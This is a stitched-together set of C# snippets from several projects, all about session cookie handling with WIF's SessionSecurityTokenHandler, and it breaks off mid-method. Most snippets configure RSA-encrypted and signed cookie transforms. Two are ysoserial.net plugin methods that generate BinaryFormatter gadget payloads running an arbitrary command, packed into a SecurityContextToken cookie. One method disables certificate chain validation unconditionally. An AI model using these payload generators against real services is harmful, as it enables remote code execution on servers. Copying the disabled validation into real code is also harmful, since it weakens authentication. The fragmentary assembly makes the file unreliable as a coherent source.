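        /// <summary>
        /// Replaces the default session token handler with one that protects the session
        /// cookie using the service certificate (deflate, then RSA-encrypt, then RSA-sign).
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        /// <exception cref="InvalidOperationException">Thrown when no service certificate is configured.</exception>
        private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            // The session cookie is handed to the browser and comes back on every request,
            // and SessionSecurityTokenHandler.ReadToken decodes it through this same
            // transform chain and deserializes the result. DeflateCookieTransform on its
            // own only compresses: the client can read the token, alter it, or hand back
            // arbitrary bytes for deserialization. Encrypt and sign with the service
            // certificate, as the other handler configurations in this file do.
            var serviceCertificate = e.ServiceConfiguration.ServiceCertificate;
            if (serviceCertificate == null)
            {
                // Fail fast instead of silently falling back to an unprotected cookie.
                throw new InvalidOperationException(
                    "No service certificate is configured; it is required to encrypt and sign session cookies.");
            }

            var sessionTransforms = new List<CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(serviceCertificate),
                new RsaSignatureCookieTransform(serviceCertificate)
            };
            var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());

            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
        }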
            /// <summary>
            /// Writes <paramref name="sessionToken"/> to <paramref name="writer"/> through the
            /// session token handler, so the handler's transform chain decides how the cookie
            /// bytes are protected on the wire.
            /// </summary>
            /// <param name="writer">Destination; wrapped in an XmlDictionaryWriter before use.</param>
            /// <param name="sessionToken">The token to serialize.</param>
            void WriteSessionToken(XmlWriter writer, SessionSecurityToken sessionToken)
            {
                var dictionaryWriter = XmlDictionaryWriter.CreateDictionaryWriter(writer);
                GetOrCreateSessionSecurityTokenHandler().WriteToken(dictionaryWriter, sessionToken);
            }
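        /// <summary>
        /// Plugin entry point: emits a WS-SecureConversation SecurityContextToken whose
        /// &lt;Cookie&gt; carries a BinaryFormatter gadget (TypeConfuseDelegate), encoded the
        /// way a default SessionSecurityTokenHandler decodes cookies: deflate, then
        /// ProtectedDataCookieTransform (DPAPI).
        /// </summary>
        /// <param name="args">Plugin arguments handed to the option parser; the fields
        /// <c>command</c> and <c>test</c> are read afterwards and are presumably set by the
        /// option callbacks.</param>
        /// <returns>The token XML with the base64-encoded cookie substituted into the template.</returns>
        /// <remarks>
        /// Because the outer layer is DPAPI, the cookie only decodes under the user/machine
        /// key that produced it, so the output is bound to where this plugin runs. Option
        /// errors and a missing command terminate the process with exit code -1. With
        /// <c>test</c> set, the XML is fed to a fresh SessionSecurityTokenHandler; the
        /// exception that results is expected and swallowed.
        /// </remarks>
        public object Run(string[] args)
        {
            try
            {
                // Parsed for validation and option side effects only; positional extras are unused.
                options.Parse(args);
            }
            catch (OptionException e)
            {
                Console.Write("ysoserial: ");
                Console.WriteLine(e.Message);
                Console.WriteLine("Try 'ysoserial --help' for more information.");
                System.Environment.Exit(-1);
            }

            string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'>
	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
		urn:unique-id:securitycontext:1337
	</Identifier>
	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";

            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
            {
                Console.Write("ysoserial: ");
                Console.WriteLine("Incorrect plugin mode/arguments combination");
                Console.WriteLine("Try 'ysoserial --help' for more information.");
                System.Environment.Exit(-1);
            }

            // Apply the transforms in the order the handler encodes them: deflate first,
            // then DPAPI protection, so the handler's decode path unwraps them in reverse.
            byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
            DeflateCookieTransform       myDeflateCookieTransform       = new DeflateCookieTransform();
            ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();

            byte[] deflateEncoded   = myDeflateCookieTransform.Encode(serializedData);
            byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
            payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));

            if (test)
            {
                // PoC on how it works in practice: a handler with default transforms reads
                // the token back. The read is expected to fail; the exception is ignored.
                try
                {
                    XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
                    SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
                    mySessionSecurityTokenHandler.ReadToken(tokenXML);
                }
                catch (Exception)
                {
                    // there will be an error!
                }
            }

            return(payload);
        }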
 /// <summary>
 /// Switches the application to passive federation with <typeparamref name="T"/> as the
 /// claims authentication manager. May only be called once per context.
 /// </summary>
 /// <param name="tokenHandler">Session token handler to install; passed through (possibly null) to ConfigurePassiveFederation.</param>
 /// <returns>This context, for chaining.</returns>
 /// <exception cref="InvalidOperationException">Thrown when federation was already initialized through this context.</exception>
 public IClaimsSetupContext MakeClaimsAware <T>(SessionSecurityTokenHandler tokenHandler = null) where T : ClaimsAuthenticationManager
 {
     if (!PassiveFederationInitialized)
     {
         Application.ConfigurePassiveFederation <T>(tokenHandler);
         PassiveFederationInitialized = true;
         return this;
     }

     throw new InvalidOperationException("Application is already made claims aware");
 }
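        /// <summary>
        /// Replaces the default session token handler with one whose cookies are deflated,
        /// RSA-encrypted and RSA-signed with the service certificate.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        /// <exception cref="InvalidOperationException">Thrown when no service certificate is configured.</exception>
        public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            // The RSA transform constructors reject a null certificate with an
            // ArgumentNullException that does not say why; check up front so the
            // failure names the missing <serviceCertificate> configuration.
            var serviceCertificate = e.ServiceConfiguration.ServiceCertificate;
            if (serviceCertificate == null)
            {
                throw new InvalidOperationException(
                    "No service certificate is configured; it is required to encrypt and sign session cookies.");
            }

            var sessionTransforms = new List<CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(serviceCertificate),
                new RsaSignatureCookieTransform(serviceCertificate)
            };

            var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
        }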
        /// <summary>
        /// Installs a session token handler whose cookies are deflated, then RSA-encrypted
        /// and RSA-signed with the service certificate, replacing the default handler.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            var certificate = e.ServiceConfiguration.ServiceCertificate;

            // No null check on the certificate here: the RSA transforms will reject it.
            var transforms = new List<CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(certificate),
                new RsaSignatureCookieTransform(certificate)
            };

            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(
                new SessionSecurityTokenHandler(transforms.AsReadOnly()));
        }
    /// <summary>
    /// Returns the session lifetime to use: the TokenLifetime of the registered
    /// SessionSecurityTokenHandler, or SessionSecurityTokenHandler.DefaultTokenLifetime
    /// when no handler is registered for SessionSecurityToken.
    /// </summary>
    /// <returns>The effective session lifetime.</returns>
    TimeSpan GetSessionLifetime()
    {
        var sessionHandler = _serviceConfiguration.SecurityTokenHandlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler;

        return sessionHandler == null
            ? SessionSecurityTokenHandler.DefaultTokenLifetime
            : sessionHandler.TokenLifetime;
    }
            /// <summary>
            /// Returns the SessionSecurityTokenHandler from a freshly created default handler
            /// collection, creating and registering one if the defaults lack it.
            /// </summary>
            /// <returns>The handler found or created.</returns>
            /// <remarks>
            /// The default collection is built on every call and then discarded, so the
            /// AddOrReplace only affects that throwaway collection, and the handler returned
            /// is independent of any handler the application registered in its own configuration.
            /// </remarks>
            private static SessionSecurityTokenHandler GetOrCreateSessionSecurityTokenHandler()
            {
                var handlers = SecurityTokenHandlerCollection.CreateDefaultSecurityTokenHandlerCollection();

                var existing = handlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler;
                if (existing != null)
                {
                    return existing;
                }

                var created = new SessionSecurityTokenHandler();
                handlers.AddOrReplace(created);
                return created;
            }
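        /// <summary>
        /// Switches session cookie protection from the default DPAPI transform to RSA
        /// encryption and signing with the federation's service certificate.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the federation configuration being built.</param>
        /// <exception cref="InvalidOperationException">Thrown when no service certificate is configured.</exception>
        void OnServiceConfigurationCreated(object sender, FederationConfigurationCreatedEventArgs e)
        {
            // Change cookie encryption type from DPAPI to RSA. This avoids a security exception due to a cookie size limit with the SSO cookie. See http://fabriccontroller.net/blog/posts/key-not-valid-for-use-in-specified-state-exception-when-working-with-the-access-control-service/
            // A side effect worth knowing: RSA-protected cookies can be read by any node
            // holding the certificate, whereas DPAPI ties them to one machine/user key.
            var serviceCertificate = e.FederationConfiguration.ServiceCertificate;
            if (serviceCertificate == null)
            {
                // The RSA transforms reject a null certificate with a bare
                // ArgumentNullException; fail here with a message that names the cause.
                throw new InvalidOperationException(
                    "No service certificate is configured; it is required to encrypt and sign session cookies.");
            }

            var sessionTransforms = new List<CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(serviceCertificate),
                new RsaSignatureCookieTransform(serviceCertificate)
            };

            var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());

            e.FederationConfiguration.IdentityConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
        }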
 /// <summary>
 /// Installs a session token handler whose cookies are deflated, then RSA-encrypted
 /// and RSA-signed using the configured &lt;serviceCertificate&gt;.
 /// </summary>
 /// <param name="sender">Event source (unused).</param>
 /// <param name="e">Carries the service configuration being built.</param>
 void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
 {
     // Use the <serviceCertificate> to protect the cookies that are sent to the client.
     // A missing certificate is not checked here; the RSA transforms will reject it.
     var certificate = e.ServiceConfiguration.ServiceCertificate;
     var transforms = new List<CookieTransform>
     {
         new DeflateCookieTransform(),
         new RsaEncryptionCookieTransform(certificate),
         new RsaSignatureCookieTransform(certificate)
     };

     e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(
         new SessionSecurityTokenHandler(transforms.AsReadOnly()));
 }
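        /// <summary>
        /// Installs a session token handler whose cookies are deflated, then RSA-encrypted
        /// and RSA-signed using the configured &lt;serviceCertificate&gt;.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        /// <exception cref="InvalidOperationException">Thrown when no service certificate is configured.</exception>
        void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            // Use the <serviceCertificate> to protect the cookies that are sent to the client.
            // Check it explicitly: the RSA transforms only raise a bare ArgumentNullException
            // when it is missing, which hides the real cause (an unconfigured certificate).
            var serviceCertificate = e.ServiceConfiguration.ServiceCertificate;
            if (serviceCertificate == null)
            {
                throw new InvalidOperationException(
                    "No service certificate is configured; it is required to encrypt and sign session cookies.");
            }

            var sessionTransforms = new List<CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(serviceCertificate),
                new RsaSignatureCookieTransform(serviceCertificate)
            };
            var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());

            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
        }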
        /// <summary>
        /// Helper method to set up the wrapped secure-conversation authenticator: obtains the
        /// WCF secure-conversation token authenticator, ensures a SessionSecurityTokenHandler
        /// exists to validate session tokens, and wraps both so that token validation yields
        /// this layer's authorization policies.
        /// </summary>
        /// <param name="tokenRequirement">The recipient-side token requirement WCF is asking to satisfy.</param>
        /// <param name="tokenHandler">Existing session token handler to use; when null a new one is created over <c>_cookieTransforms</c>.</param>
        /// <param name="outOfBandTokenResolver">Receives the wrapped token cache, which WCF uses to resolve issued tokens.</param>
        /// <returns>The wrapping authenticator that WCF will call for validation.</returns>
        SecurityTokenAuthenticator SetupSecureConversationWrapper(RecipientServiceModelSecurityTokenRequirement tokenRequirement, SessionSecurityTokenHandler tokenHandler, out SecurityTokenResolver outOfBandTokenResolver)
        {
            // This code requires Orcas SP1 to compile.
            // WCF expects this securityTokenAuthenticator to support:
            // 1. IIssuanceSecurityTokenAuthenticator
            // 2. ICommunicationObject is needed for this to work right.
            // WCF opens a listener in this STA that handles the nego and uses an internal class for negotiating the
            // the bootstrap tokens.  We want to handle ValidateToken to return our authorization policies and surface the bootstrap tokens.

            // when sp1 is installed, use this one.
            //SecurityTokenAuthenticator sta = base.CreateSecureConversationTokenAuthenticator( tokenRequirement as RecipientServiceModelSecurityTokenRequirement, _saveBootstrapTokensInSession, out outOfBandTokenResolver );

            // use this code if SP1 is not installed
            SecurityTokenAuthenticator  sta = base.CreateSecurityTokenAuthenticator(tokenRequirement, out outOfBandTokenResolver);
            SessionSecurityTokenHandler sessionTokenHandler = tokenHandler;

            //
            // If there is no SCT handler here, create one with the default lifetime and
            // attach it to this collection so it shares the collection's Configuration.
            //
            if (tokenHandler == null)
            {
                sessionTokenHandler = new SessionSecurityTokenHandler(_cookieTransforms, SessionSecurityTokenHandler.DefaultTokenLifetime);
                sessionTokenHandler.ContainingCollection = _securityTokenHandlerCollection;
                sessionTokenHandler.Configuration        = _securityTokenHandlerCollection.Configuration;
            }

            // Align the handler's clock-skew tolerance with the service's identity configuration.
            // NOTE(review): a caller-supplied handler is assumed to already have a Configuration;
            // if it does not, this assignment dereferences null — confirm callers guarantee it.
            if (ServiceCredentials != null)
            {
                sessionTokenHandler.Configuration.MaxClockSkew = ServiceCredentials.IdentityConfiguration.MaxClockSkew;
            }

            SctClaimsHandler claimsHandler = new SctClaimsHandler(
                _securityTokenHandlerCollection,
                GetNormalizedEndpointId(tokenRequirement));

            WrappedSessionSecurityTokenAuthenticator wssta = new WrappedSessionSecurityTokenAuthenticator(sessionTokenHandler, sta,
                                                                                                          claimsHandler, _exceptionMapper);
            WrappedTokenCache wrappedTokenCache = new WrappedTokenCache(_tokenCache, claimsHandler);

            // The out resolver from CreateSecurityTokenAuthenticator is replaced by our wrapped cache.
            SetWrappedTokenCache(wrappedTokenCache, sta, wssta, claimsHandler);
            outOfBandTokenResolver = wrappedTokenCache;

            return(wssta);
        }
        /// <summary>
        /// Initializes an instance of <see cref="WrappedSessionSecurityTokenAuthenticator"/>, wrapping a
        /// WCF session token authenticator so validation can be routed through the given
        /// <see cref="SessionSecurityTokenHandler"/>.
        /// </summary>
        /// <param name="sessionTokenHandler">The sessionTokenHandler to wrap</param>
        /// <param name="wcfSessionAuthenticator">The wcf SessionTokenAuthenticator; must implement both
        /// IIssuanceSecurityTokenAuthenticator and ICommunicationObject.</param>
        /// <param name="sctClaimsHandler">Handler that converts WCF generated IAuthorizationPolicy to <see cref="AuthorizationPolicy"/></param>
        /// <param name="exceptionMapper">Converts token validation exception to SOAP faults.</param>
        /// <exception cref="ArgumentNullException">Raised through the throw helper when any argument is null, checked in parameter order.</exception>
        /// <exception cref="InvalidOperationException">Raised (SR.ID4244 / SR.ID4245) when <paramref name="wcfSessionAuthenticator"/> lacks one of the two required interfaces.</exception>
        public WrappedSessionSecurityTokenAuthenticator(SessionSecurityTokenHandler sessionTokenHandler,
                                                        SecurityTokenAuthenticator wcfSessionAuthenticator,
                                                        SctClaimsHandler sctClaimsHandler,
                                                        ExceptionMapper exceptionMapper)
            : base()
        {
            // Argument guards, in declaration order, via the shared throw helpers.
            if (sessionTokenHandler == null) throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sessionTokenHandler");
            if (wcfSessionAuthenticator == null) throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("wcfSessionAuthenticator");
            if (sctClaimsHandler == null) throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sctClaimsHandler");
            if (exceptionMapper == null) throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("exceptionMapper");

            // WCF drives token issuance and the listener lifecycle through these two views
            // of the same authenticator object; both are required.
            var issuanceAuthenticator = wcfSessionAuthenticator as IIssuanceSecurityTokenAuthenticator;
            if (issuanceAuthenticator == null) throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4244));

            var communicationObject = wcfSessionAuthenticator as ICommunicationObject;
            if (communicationObject == null) throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4245));

            _issuanceSecurityTokenAuthenticator = issuanceAuthenticator;
            _communicationObject                = communicationObject;
            _sessionTokenHandler                = sessionTokenHandler;
            _sctClaimsHandler                   = sctClaimsHandler;
            _exceptionMapper                    = exceptionMapper;
        }
        /// <summary>
        /// Installs a session token handler that protects cookies with the site certificate
        /// (deflate, RSA encryption, RSA signature), failing loudly when none is configured.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        /// <exception cref="ApplicationException">Thrown when the service certificate is not configured.</exception>
        private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            var certificate = e.ServiceConfiguration.ServiceCertificate;
            if (certificate == null)
            {
                // The certificate comes from web.config, e.g. (thumbprint is a sample value):
                // <serviceCertificate>
                //   <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" />
                // </serviceCertificate>
                throw new ApplicationException("No site certificate; is it set up in web.config?");
            }

            var transforms = new List<CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(certificate),
                new RsaSignatureCookieTransform(certificate)
            };

            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(
                new SessionSecurityTokenHandler(transforms.AsReadOnly()));
        }
        /// <summary>
        /// Removes any session token handler already registered in
        /// <paramref name="identitySettings"/> and registers <paramref name="tokenHandler"/>
        /// in its place, or a <see cref="MachineKeySessionSecurityTokenHandler"/> when none
        /// was supplied.
        /// </summary>
        /// <param name="tokenHandler">Handler to register; may be null.</param>
        /// <param name="identitySettings">Identity configuration whose handler collection is edited.</param>
        /// <remarks>
        /// SingleOrDefault throws if more than one registered handler matches, so this relies
        /// on the collection holding at most one session handler. NOTE(review): by its name,
        /// the MachineKey fallback protects cookies with the ASP.NET machineKey rather than a
        /// per-machine DPAPI key — confirm against the framework docs before relying on it
        /// for a web farm.
        /// </remarks>
        void ChangeTokenHandler(SessionSecurityTokenHandler tokenHandler, IdentityConfiguration identitySettings)
        {
            var handlers = identitySettings.SecurityTokenHandlers;

            var existing = handlers
                .Where(h => h.GetType().Implements <SessionSecurityTokenHandler>() || h is SessionSecurityTokenHandler)
                .SingleOrDefault();
            if (existing.IsInstance())
            {
                handlers.Remove(existing);
            }

            SessionSecurityTokenHandler replacement = tokenHandler;
            if (!replacement.IsInstance())
            {
                replacement = new MachineKeySessionSecurityTokenHandler();
            }
            handlers.Add(replacement);

            Logging.DebugMessage("Configured Identity token handler");
        }
        /// <summary>
        /// Installs a session token handler that protects cookies with the site certificate
        /// (deflate, RSA encryption, RSA signature), failing loudly when none is configured.
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        /// <exception cref="ApplicationException">Thrown when the service certificate is not configured.</exception>
        private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            var serviceConfiguration = e.ServiceConfiguration;

            // The certificate is read from web.config, e.g. (thumbprint is a sample value):
            // <serviceCertificate>
            //   <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" />
            // </serviceCertificate>
            if (serviceConfiguration.ServiceCertificate == null)
            {
                throw new ApplicationException("No site certificate; is it set up in web.config?");
            }

            CookieTransform[] transforms =
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(serviceConfiguration.ServiceCertificate),
                new RsaSignatureCookieTransform(serviceConfiguration.ServiceCertificate)
            };
            var handler = new SessionSecurityTokenHandler(new List<CookieTransform>(transforms).AsReadOnly());

            serviceConfiguration.SecurityTokenHandlers.AddOrReplace(handler);
        }
        /// <summary>
        /// On Service Configuration Created: installs a session token handler whose cookies
        /// are deflated, RSA-encrypted and RSA-signed with the service certificate.
        /// </summary>
        /// <param name="sender">Sender</param>
        /// <param name="e">Service Configuration Created Event Args</param>
        /// <remarks>
        /// A missing certificate surfaces as an ArgumentNullException from the RSA transforms;
        /// it is logged as Fault.CertificateNotSpecified and otherwise ignored, so the
        /// configuration keeps whatever session handler it already had.
        /// </remarks>
        private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            using (new PerformanceMonitor())
            {
                try
                {
                    var certificate = e.ServiceConfiguration.ServiceCertificate;
                    var transforms = new List<CookieTransform>
                    {
                        new DeflateCookieTransform(),
                        new RsaEncryptionCookieTransform(certificate),
                        new RsaSignatureCookieTransform(certificate)
                    };

                    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(
                        new SessionSecurityTokenHandler(transforms.AsReadOnly()));
                }
                catch (ArgumentNullException aex)
                {
                    // Logged, not rethrown: startup continues with the previous handler.
                    logger.Log(aex, EventTypes.Error, (int)Fault.CertificateNotSpecified);
                }
            }
        }
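        /// <summary>
        /// Plugin entry point: emits a WS-SecureConversation SecurityContextToken whose
        /// &lt;Cookie&gt; carries a BinaryFormatter gadget (TextFormattingRunProperties),
        /// encoded the way a default SessionSecurityTokenHandler decodes cookies: deflate,
        /// then ProtectedDataCookieTransform (DPAPI).
        /// </summary>
        /// <param name="args">Plugin arguments handed to the option parser; the fields
        /// <c>command</c>, <c>minify</c>, <c>useSimpleType</c> and <c>test</c> are read after
        /// parsing and are presumably set by the option callbacks.</param>
        /// <returns>The token XML with the base64-encoded cookie substituted into the template.</returns>
        /// <remarks>
        /// Because the outer layer is DPAPI, the cookie only decodes under the user/machine
        /// key that produced it, so the output is bound to where this plugin runs. Option
        /// errors and a missing command terminate the process with exit code -1. With
        /// <c>test</c> set, the XML is fed to a fresh SessionSecurityTokenHandler; the
        /// exception that results is expected and swallowed.
        /// </remarks>
        public object Run(string[] args)
        {
            InputArgs inputArgs = new InputArgs();

            try
            {
                // Parsed for validation and option side effects only; positional extras are unused.
                options.Parse(args);
                inputArgs.CmdFullString = command;
                inputArgs.Minify        = minify;
                inputArgs.UseSimpleType = useSimpleType;
                inputArgs.Test          = test;
            }
            catch (OptionException e)
            {
                Console.Write("ysoserial: ");
                Console.WriteLine(e.Message);
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                System.Environment.Exit(-1);
            }

            string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
		urn:unique-id:securitycontext:1
	</Identifier>
	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
</SecurityContextToken>";

            // The template is minified before substitution and the result again afterwards.
            // The first pass looks redundant given the second; kept as-is pending confirmation
            // that Minify is idempotent and leaves the {0} placeholder untouched.
            if (minify)
            {
                payload = XMLMinifier.Minify(payload, null, null);
            }

            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
            {
                Console.Write("ysoserial: ");
                Console.WriteLine("Incorrect plugin mode/arguments combination");
                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                System.Environment.Exit(-1);
            }

            // Apply the transforms in the order the handler encodes them: deflate first,
            // then DPAPI protection, so the handler's decode path unwraps them in reverse.
            byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
            DeflateCookieTransform       myDeflateCookieTransform       = new DeflateCookieTransform();
            ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();

            byte[] deflateEncoded   = myDeflateCookieTransform.Encode(serializedData);
            byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
            payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));

            if (test)
            {
                // PoC on how it works in practice: a handler with default transforms reads
                // the token back. The read is expected to fail; the exception is ignored.
                try
                {
                    XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
                    SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
                    mySessionSecurityTokenHandler.ReadToken(tokenXML);
                }
                catch
                {
                    // there will be an error!
                }
            }

            if (minify)
            {
                payload = XMLMinifier.Minify(payload, null, null);
            }

            return(payload);
        }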
 /// <summary>
 /// Records <typeparamref name="TAuth"/> as the claims authentication manager and
 /// <typeparamref name="TCache"/> as the session token cache, then configures passive
 /// federation for <paramref name="application"/>.
 /// </summary>
 /// <param name="application">The web application to configure.</param>
 /// <param name="tokenHandler">Session token handler to install; passed through to the non-generic overload.</param>
 public static void ConfigurePassiveFederation <TAuth, TCache>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler)
     where TAuth : ClaimsAuthenticationManager
     where TCache : SessionSecurityTokenCache
 {
     if (WebServerConfiguration.IsConfiguredAsWebFront)
     {
         Logging.DebugMessage("Stardust web requirements configured");
     }

     // Both type registrations are published under the same lock.
     lock (Triowing)
     {
         AuthorizationManager = typeof(TAuth);
         CahceModule          = typeof(TCache);
     }
     Logging.DebugMessage("Managers added to initializer");

     application.ConfigurePassiveFederation(tokenHandler);
 }
 /// <summary>
 /// Sets <typeparamref name="T"/> as the claims authentication manager, then configures
 /// passive federation for <paramref name="application"/>.
 /// </summary>
 /// <param name="application">The web application to configure.</param>
 /// <param name="tokenHandler">Session token handler to install; passed through to the non-generic overload.</param>
 public static void ConfigurePassiveFederation <T>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler) where T : ClaimsAuthenticationManager
 {
     Logging.DebugMessage("Initializing Stardust...");

     SetClaimsManager <T>();
     Logging.DebugMessage("Claims manager set");

     application.ConfigurePassiveFederation(tokenHandler);
 }
 /// <summary>
 /// Configures passive federation for <paramref name="application"/>: builds the runtime,
 /// reads settings and root URL, configures identity settings and audience, and initializes
 /// FederatedAuthentication if it is not already initialized.
 /// </summary>
 /// <param name="application">The web application to configure.</param>
 /// <param name="tokenHandler">Session token handler handed to ConfigureIdentitySettings; may be null.</param>
 /// <remarks>
 /// NOTE(review): DisableChainValidation is called unconditionally; by its name it turns
 /// off certificate chain validation, which weakens issuer verification — confirm this is
 /// intended for production and not only for self-signed development certificates.
 /// </remarks>
 public static void ConfigurePassiveFederation(this HttpApplication application, SessionSecurityTokenHandler tokenHandler)
 {
     using (ContainerFactory.Current.ExtendScope(Scope.Context))
     {
         Logging.DebugMessage("Initializing Runtime");
         var runtime = CreateRuntime();
         Logging.DebugMessage("Runtime initialized");

         var settings = GetSettings(runtime);
         Logging.DebugMessage("Settings obtained");

         var rootUrl = GetRootUrl(runtime);
         Logging.DebugMessage("Root url obtained");

         DisableChainValidation(settings);
         Logging.DebugMessage("Chain validation set");

         ConfigureIdentitySettings(settings, rootUrl, tokenHandler);
         Logging.DebugMessage("Identity settins configured");

         AddAudience(settings, rootUrl);
         Logging.DebugMessage("Audience added");

         var federation = FederatedAuthentication.FederationConfiguration;
         if (!federation.IsInitialized)
         {
             federation.Initialize();
             Logging.DebugMessage("Federated authentication initialized");
         }

         Logging.DebugMessage("Configuration completed");
     }
 }
        /// <summary>
        /// Applies STS settings from the environment and external modules, sets issuer and
        /// certificate validation mode, swaps in the session token handler, configures
        /// federation, and registers the thumbprint resolver.
        /// </summary>
        /// <param name="settings">Identity settings to populate and apply.</param>
        /// <param name="rootUrl">Application root URL used for federation settings.</param>
        /// <param name="tokenHandler">Session token handler passed to ChangeTokenHandler; may be null.</param>
        /// <remarks>
        /// When a SessionAuthenticationModule is present, IsReferenceMode is switched on.
        /// NOTE(review): by the property's name this makes the cookie a reference to a
        /// server-side cached token rather than the token itself — confirm the configured
        /// cache is shared across nodes if the site runs on more than one.
        /// </remarks>
        private static void ConfigureIdentitySettings(IdentitySettings settings, string rootUrl, SessionSecurityTokenHandler tokenHandler)
        {
            GetStsSettingsFromEnvironment(settings);
            var identityConfiguration = ConfigureWithExternalModules();

            SetIssuer(settings, identityConfiguration);
            SetCertificateValidationMode(settings, identityConfiguration);
            ChangeTokenHandler(tokenHandler, identityConfiguration);
            ConfigureFederationSettings(settings, rootUrl);

            var sessionModule = FederatedAuthentication.SessionAuthenticationModule;
            if (sessionModule.IsInstance())
            {
                sessionModule.IsReferenceMode = true;
            }

            ThumbprintResolver.RegisterWeb(identityConfiguration);
        }
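        /// <summary>
        /// Replaces the default session token handler with one that protects the session
        /// cookie using the service certificate (deflate, then RSA-encrypt, then RSA-sign).
        /// </summary>
        /// <param name="sender">Event source (unused).</param>
        /// <param name="e">Carries the service configuration being built.</param>
        /// <exception cref="InvalidOperationException">Thrown when no service certificate is configured.</exception>
        private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
        {
            // A transform chain consisting only of DeflateCookieTransform compresses the
            // session token but neither encrypts nor signs it: the browser can read and
            // alter the cookie, and SessionSecurityTokenHandler.ReadToken decodes and
            // deserializes whatever the client sends back. Protect the cookie with the
            // service certificate, matching the other handler configurations in this file.
            X509Certificate2 serviceCertificate = e.ServiceConfiguration.ServiceCertificate;
            if (serviceCertificate == null)
            {
                // Fail fast rather than silently fall back to an unprotected cookie.
                throw new InvalidOperationException(
                    "No service certificate is configured; it is required to encrypt and sign session cookies.");
            }

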